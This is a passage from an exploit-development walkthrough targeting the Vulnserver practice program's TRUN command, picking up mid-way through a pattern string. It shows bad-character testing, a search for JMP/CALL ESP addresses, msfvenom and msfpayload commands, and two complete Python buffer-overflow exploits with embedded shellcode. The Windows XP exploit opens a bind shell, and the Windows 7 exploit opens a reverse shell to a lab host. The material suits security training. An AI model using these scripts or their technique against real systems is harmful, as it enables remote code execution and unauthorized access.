Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2G

3. After we determine the offset we have to determine the bad characters in our case the \x00

We use this script below to determine a bad char:
#!/usr/bin/python
import socket
server = '192.168.1.26'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0, 256):
testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)

s.close()

When we tests with the  \x00 we get an access violation at 45444342 the last that we get written is BCDE - so \x00 is a bad char.








To skip \x00 we change the range of characters to (1,256). I saw that after skipping the bad char there were chars going to the stack. 
















4. We will need to jump to an ESP register where we can inject our exploitation code.

For XP I used findjmp to find a ESP that is directly to KERNEL32.DLL:
https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin

Both USER32 and KERNEL32 are usable:
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp

#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0      call esp
#0x7C86467B      jmp esp
#0x7C868667      call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register

For Windows 7 I used mona to find an ESP in essfunc.dll since it is not  ASLR protected:
!mona find -s "\xff\xe4" -m essfunc.dll











5. The payload:

For Windows XP I used a bind shell, this did not work on Windows 7:
#/usr/share/framework2
./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"

For Windows 7 I determined that the working variant was a reverse shell with msfvenom: 

#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' 


Exploit for Vulnserver on  Windows XP:
import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.27'
SER_PORT = 9999

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)
#Possible Registers for usage on XP SP3
#https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp
#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0      call esp
#0x7C86467B      jmp esp
#0x7C868667      call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register
message = '\x41' * 2006 + '\x67\x86\x86\x7c' #CALL ESP that we chose
message += '\x90' * 16

#/usr/share/framework2
#./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"
message +=(
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef\x4d\x96"
"\x95\x83\xeb\xfc\xe2\xf4\x13\x27\x7d\xd8\x07\xb4\x69\x6a\x10\x2d"
"\x1d\xf9\xcb\x69\x1d\xd0\xd3\xc6\xea\x90\x97\x4c\x79\x1e\xa0\x55"
"\x1d\xca\xcf\x4c\x7d\xdc\x64\x79\x1d\x94\x01\x7c\x56\x0c\x43\xc9"
"\x56\xe1\xe8\x8c\x5c\x98\xee\x8f\x7d\x61\xd4\x19\xb2\xbd\x9a\xa8"
"\x1d\xca\xcb\x4c\x7d\xf3\x64\x41\xdd\x1e\xb0\x51\x97\x7e\xec\x61"
"\x1d\x1c\x83\x69\x8a\xf4\x2c\x7c\x4d\xf1\x64\x0e\xa6\x1e\xaf\x41"
"\x1d\xe5\xf3\xe0\x1d\xd5\xe7\x13\xfe\x1b\xa1\x43\x7a\xc5\x10\x9b"
"\xf0\xc6\x89\x25\xa5\xa7\x87\x3a\xe5\xa7\xb0\x19\x69\x45\x87\x86"
"\x7b\x69\xd4\x1d\x69\x43\xb0\xc4\x73\xf3\x6e\xa0\x9e\x97\xba\x27"
"\x94\x6a\x3f\x25\x4f\x9c\x1a\xe0\xc1\x6a\x39\x1e\xc5\xc6\xbc\x1e"
"\xd5\xc6\xac\x1e\x69\x45\x89\x25\x93\xb4\x89\x1e\x1f\x74\x7a\x25"
"\x32\x8f\x9f\x8a\xc1\x6a\x39\x27\x86\xc4\xba\xb2\x46\xfd\x4b\xe0"
"\xb8\x7c\xb8\xb2\x40\xc6\xba\xb2\x46\xfd\x0a\x04\x10\xdc\xb8\xb2"
"\x40\xc5\xbb\x19\xc3\x6a\x3f\xde\xfe\x72\x96\x8b\xef\xc2\x10\x9b"
"\xc3\x6a\x3f\x2b\xfc\xf1\x89\x25\xf5\xf8\x66\xa8\xfc\xc5\xb6\x64"
"\x5a\x1c\x08\x27\xd2\x1c\x0d\x7c\x56\x66\x45\xb3\xd4\xb8\x11\x0f"
"\xba\x06\x62\x37\xae\x3e\x44\xe6\xfe\xe7\x11\xfe\x80\x6a\x9a\x09"
"\x69\x43\xb4\x1a\xc4\xc4\xbe\x1c\xfc\x94\xbe\x1c\xc3\xc4\x10\x9d"
"\xfe\x38\x36\x48\x58\xc6\x10\x9b\xfc\x6a\x10\x7a\x69\x45\x64\x1a"
"\x6a\x16\x2b\x29\x69\x43\xbd\xb2\x46\xfd\x1f\xc7\x92\xca\xbc\xb2"
"\x40\x6a\x3f\x4d\x96\x95")

my_sock.send(('TRUN .' + message + '\r\n'))

print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()

Exploit for  Vulnserver on Windows 7:
import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.26'
SER_PORT = 9999

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)

prefix = '\x41' * 2006
esp = '\xaf\x11\x50\x62' #CALL ESP that we chose
nopsled = '\x90' * 16

#!mona find -s "\xff\xe4" -m essfunc.dll
#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' <-works
payload =(
"\xdd\xc5\xd9\x74\x24\xf4\xb8\x84\x6e\x28\xf3\x5a\x33\xc9\xb1"
"\x52\x31\x42\x17\x03\x42\x17\x83\x46\x6a\xca\x06\xba\x9b\x88"
"\xe9\x42\x5c\xed\x60\xa7\x6d\x2d\x16\xac\xde\x9d\x5c\xe0\xd2"
"\x56\x30\x10\x60\x1a\x9d\x17\xc1\x91\xfb\x16\xd2\x8a\x38\x39"
"\x50\xd1\x6c\x99\x69\x1a\x61\xd8\xae\x47\x88\x88\x67\x03\x3f"
"\x3c\x03\x59\xfc\xb7\x5f\x4f\x84\x24\x17\x6e\xa5\xfb\x23\x29"
"\x65\xfa\xe0\x41\x2c\xe4\xe5\x6c\xe6\x9f\xde\x1b\xf9\x49\x2f"
"\xe3\x56\xb4\x9f\x16\xa6\xf1\x18\xc9\xdd\x0b\x5b\x74\xe6\xc8"
"\x21\xa2\x63\xca\x82\x21\xd3\x36\x32\xe5\x82\xbd\x38\x42\xc0"
"\x99\x5c\x55\x05\x92\x59\xde\xa8\x74\xe8\xa4\x8e\x50\xb0\x7f"
"\xae\xc1\x1c\xd1\xcf\x11\xff\x8e\x75\x5a\x12\xda\x07\x01\x7b"
"\x2f\x2a\xb9\x7b\x27\x3d\xca\x49\xe8\x95\x44\xe2\x61\x30\x93"
"\x05\x58\x84\x0b\xf8\x63\xf5\x02\x3f\x37\xa5\x3c\x96\x38\x2e"
"\xbc\x17\xed\xe1\xec\xb7\x5e\x42\x5c\x78\x0f\x2a\xb6\x77\x70"
"\x4a\xb9\x5d\x19\xe1\x40\x36\xe6\x5e\x4b\xc9\x8e\x9c\x4b\xc4"
"\x12\x28\xad\x8c\xba\x7c\x66\x39\x22\x25\xfc\xd8\xab\xf3\x79"
"\xda\x20\xf0\x7e\x95\xc0\x7d\x6c\x42\x21\xc8\xce\xc5\x3e\xe6"
"\x66\x89\xad\x6d\x76\xc4\xcd\x39\x21\x81\x20\x30\xa7\x3f\x1a"
"\xea\xd5\xbd\xfa\xd5\x5d\x1a\x3f\xdb\x5c\xef\x7b\xff\x4e\x29"
"\x83\xbb\x3a\xe5\xd2\x15\x94\x43\x8d\xd7\x4e\x1a\x62\xbe\x06"
"\xdb\x48\x01\x50\xe4\x84\xf7\xbc\x55\x71\x4e\xc3\x5a\x15\x46"
"\xbc\x86\x85\xa9\x17\x03\xb5\xe3\x35\x22\x5e\xaa\xac\x76\x03"
"\x4d\x1b\xb4\x3a\xce\xa9\x45\xb9\xce\xd8\x40\x85\x48\x31\x39"
"\x96\x3c\x35\xee\x97\x14"
)

message = prefix + esp + nopsled + payload + 'C' * (3000-len(prefix)-len(esp)-len(nopsled)-len(payload))
my_sock.send(('TRUN .' + message + '\r\n'))

print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()